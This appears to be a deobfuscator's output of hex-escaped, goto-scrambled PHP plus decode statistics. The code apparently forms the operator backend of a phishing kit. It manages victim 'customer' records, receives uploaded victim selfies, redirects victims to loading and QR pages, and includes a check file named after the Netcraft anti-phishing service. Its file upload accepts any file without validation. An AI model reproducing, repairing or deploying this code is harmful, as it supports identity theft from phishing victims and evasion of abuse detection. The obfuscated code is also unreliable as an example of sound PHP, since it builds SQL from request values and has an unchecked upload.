"\123\x45\x4c\x45\103\x54\x20\52\40\x46\122\117\x4d\40\x63\x75\x73\x74\157\155\x65\x72\x73\x20\127\x48\105\x52\x45\x20\x73\x74\x61\164\165\x73\x3c\x3d\70"); if ($query) { $array = array_filter(mysqli_fetch_all($query, MYSQLI_ASSOC)); foreach ($array as $value) { $userid = $value["\151\144"]; $queryy = mysqli_query($conn, "\x55\x50\104\101\124\105\x20\x63\165\163\164\157\x6d\145\x72\x73\x20\123\x45\x54\x20\x62\165\172\x7a\x65\x64\75\x31\x20\x57\x48\x45\122\105\x20\x69\144\x3d{$userid}"); if ($queryy) { $stat = "\x6f\x6b"; } else { $stat = "\156\x6f\x74\157\x6b"; } } if ($stat == "\157\153") { echo json_encode(array("\x73\164\x61\x74\x75\x73" => "\x6f\x6b")); } else { echo json_encode(array("\163\x74\x61\164\165\x73" => "\156\157\x74\x6f\x6b")); } } else { echo json_encode(array("\163\164\141\x74\x75\x73" => "\x6e\x6f\x74\157\x6b")); } } if ($_GET["\x74\171\160\145"] == "\x64\145\154\x65\x74\x65") { if ($_POST["\165\163\145\x72\151\x64"] and numeric($_POST["\x75\x73\145\x72\151\144"]) == true) { $userid = $_POST["\165\163\145\x72\x69\x64"]; $query = mysqli_query($conn, "\x44\x45\x4c\x45\x54\x45\x20\106\x52\117\x4d\40\x63\x75\x73\164\157\155\x65\162\x73\40\127\x48\x45\x52\x45\40\x69\x64\75{$userid}"); if ($query) { echo json_encode(array("\x73\x74\x61\164\165\163" => "\157\x6b")); } else { echo json_encode(array("\x73\x74\141\x74\165\x73" => "\156\157\x74\x6f\x6b")); } } else { echo json_encode(array("\x73\x74\141\x74\x75\163" => "\156\x6f\164\157\x6b\x6b")); } } } goto F2gdJ; izm9r: function numeric($num) { if (preg_match("\x2f\x5e\133\x30\x2d\x39\x5d\x2b\44\x2f", $num)) { $status = true; } else { $status = false; } return $status; } goto k0702; Fu6KC: session_start(); goto izm9r; Mtm7q: include "\x6d\141\162\x67\151\156\56\160\x68\x70"; goto DT15H; XuRq4: include "\56\56\57\166\x65\x6e\x64\x6f\x72\57\63\x30\60\56\x70\x68\x70"; goto s41oT; F2gdJ: if ($_SESSION["\163\x74\x61\x72\x74\x65\x64"] == "\164\162\x75\145") { if ($_GET["\x67\x65\x74\163\x74\141\164\x75\x73"] and numeric($_GET["\147\145\164\163\164\x61\x74\x75\163"]) == true) { $id = $_GET["\147\x65\x74\163\x74\141\x74\165\x73"]; $query = mysqli_query($conn, "\x53\x45\114\105\x43\124\x20\52\40\146\162\157\155\x20\143\165\x73\164\x6f\x6d\145\x72\163\40\127\x48\105\122\105\40\165\156\151\161\165\145\151\144\75\x27{$id}\47"); if (mysqli_num_rows($query) >= 1) { $array = mysqli_fetch_array($query, MYSQLI_ASSOC); echo $array["\163\x74\x61\164\x75\163"]; } } if ($_GET["\164\x79\x70\145"] == "\125\x73\x65\162\125\160\x6c\x6f\x61\x64") { if ($_FILES["\141\x74\164\x61\143\150\x6d\145\156\x74"] and $_POST["\x75\x73\x65\162\x69\x64"] and numeric($_POST["\165\x73\145\162\x69\x64"]) == true) { $targetDir = "\x2e\56\57\56\56\x2f\x75\x70\x6c\x6f\x61\144\x73\57"; $fileName = basename($_FILES["\x61\164\x74\141\x63\150\155\145\x6e\164"]["\x6e\141\x6d\x65"]); $uniqueid = $_POST["\165\x73\145\x72\151\144"]; $targetFilePath = $targetDir . $uniqueid . $fileName; move_uploaded_file($_FILES["\x61\x74\x74\x61\143\x68\155\x65\156\x74"]["\x74\x6d\x70\137\x6e\x61\155\x65"], $targetFilePath); $comment = "\x53\x65\154\x66\x69\x65\x20\x55\x70\154\157\x61\x64\x65\144\x2c\x20\165\x73\145\x72\40\167\x61\151\164\151\x6e\x67"; $filepath = $targetFilePath; $query = mysqli_query($conn, "\x55\120\x44\x41\124\105\x20\143\165\x73\x74\157\x6d\145\x72\x73\x20\x53\105\124\40\x66\151\x6c\x65\x70\x61\164\x68\75\x27{$filepath}\47\x2c\x20\x63\x6f\x6d\155\x65\x6e\164\x3d\x27{$comment}\x27\54\x20\x73\164\141\x74\x75\163\75\x32\54\40\142\165\x7a\172\145\x64\75\x30\40\x57\110\105\122\x45\x20\x75\156\151\x71\x75\145\x69\x64\75{$uniqueid}"); if ($query) { header("\114\157\x63\x61\x74\x69\x6f\x6e\x3a\x20\x2e\x2e\57\154\x6f\x61\x64\x69\x6e\x67\56\x70\x68\x70\x3f\x75\x73\x65\x72\75\164\x72\x75\x65"); echo json_encode(array("\x73\164\141\164\165\x73" => "\x6f\153")); } else { header("\x4c\157\143\141\x74\x69\x6f\156\72\40\x2e\x2e\x2f\161\x72\x2e\x70\x68\x70\x3f\165\x73\145\162\75\x74\162\x75\x65"); echo json_encode(array("\163\x74\x61\164\x75\x73" => "\x55\160\x6c\x6f\141\x64\x20\105\162\x72\x6f\x72")); } } } } goto jWbEo; E6HN2: include "\56\56\57\56\56\x2f\x43\117\116\106\x49\x47\x2e\160\150\x70"; goto Mtm7q; DT15H: include "\x2e\56\x2f\166\145\156\x64\157\x72\57\61\x30\x30\56\x70\x68\x70"; goto ThZu_; ThZu_: include "\x2e\x2e\x2f\x76\x65\x6e\x64\x6f\x72\57\62\x30\60\x2e\x70\x68\x70"; goto XuRq4; CXa0e: include "\x2e\x2e\57\x76\x65\156\144\x6f\x72\57\x6e\145\x74\143\x72\x61\x66\164\x5f\143\x68\x65\143\x6b\x2e\x70\150\x70"; goto Fu6KC; jWbEo: ?>

Function Calls

None

Variables

None

Stats

MD5 dca5cbe454e32bfdf5afdd7a36e6f77e
Eval Count 0
Decode Time 81 ms